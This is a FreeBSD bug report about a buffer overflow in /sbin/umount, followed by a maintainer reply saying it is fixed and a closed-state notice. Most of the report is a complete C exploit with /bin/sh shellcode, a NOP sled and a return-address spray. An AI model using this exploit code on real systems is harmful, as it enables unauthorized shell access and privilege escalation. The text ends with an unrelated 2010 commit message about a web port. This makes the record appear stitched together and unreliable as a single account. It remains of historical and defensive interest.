It's possible to execute arbitrary code by overflowing buffer in umount(8). By default umount(8) is NOT installed with setuid or setgid bits set. How-To-Repeat: /* * * (c) 1999 babcia padlina ltd. <babunia@FreeBSD.lublin.pl> * FreeBSD /sbin/umount exploit. * */ #include <stdio.h> #include <sys/param.h> #include <sys/stat.h> #include <string.h> #define NOP 0x90 #define OFS 1800 #define BUFSIZE 1024 #define ADDRS 1200 long getesp(void) { __asm__("movl %esp, %eax\n"); } int main(argc, argv) int argc; char **argv; { char *execshell = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; char *buf, *p; int noplen, i, ofs; long ret, *ap; if(!(buf = (char *)malloc(BUFSIZE+1))) { perror("malloc()"); return -1; } if (argc > 2) ofs = atoi(argv[1]); else ofs = OFS; noplen = BUFSIZE - strlen(execshell); ret = getesp() + ofs; memset(buf, NOP, noplen); buf[noplen+1] = '\0'; strcat(buf, execshell); setenv("EGG", buf, 1); if(!(buf = (char *)malloc(ADDRS+1))) { perror("malloc()"); return -1; } p = buf; ap = (unsigned long *)p; for(i = 0; i < ADDRS / 4; i++) *ap++ = ret; p = (char *)ap; *p = '\0'; fprintf(stderr, "RET: 0x%x len: %d\n\n", ret, strlen(buf)); chmod(".", 0); // fuck da realpath()! execl("/sbin/umount", "umount", buf, 0); return 0; }
Hi, This is fixed in current since 2 day's. CVSup to the newest sources and try again. And you should not run umount(8) +s anyway :) But we should fix it in releng_3 (and 2.2.8). Thank you very much for your bugreport. Martin
State Changed From-To: open->closed This has been fixed in -CURRENT and 3.3/3.4.
brooks 2010-02-18 20:29:51 UTC FreeBSD ports repository Modified files: www/ftasv Makefile Log: This port works fine with Apache 2.0 so adjust USE_APACHE accordingly. Approved by: sylvio (maintainer) Feature safe: yes PR: ports/14406 Revision Changes Path 1.3 +1 -1 ports/www/ftasv/Makefile _______________________________________________ cvs-all@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/cvs-all To unsubscribe, send any mail to "cvs-all-unsubscribe@freebsd.org"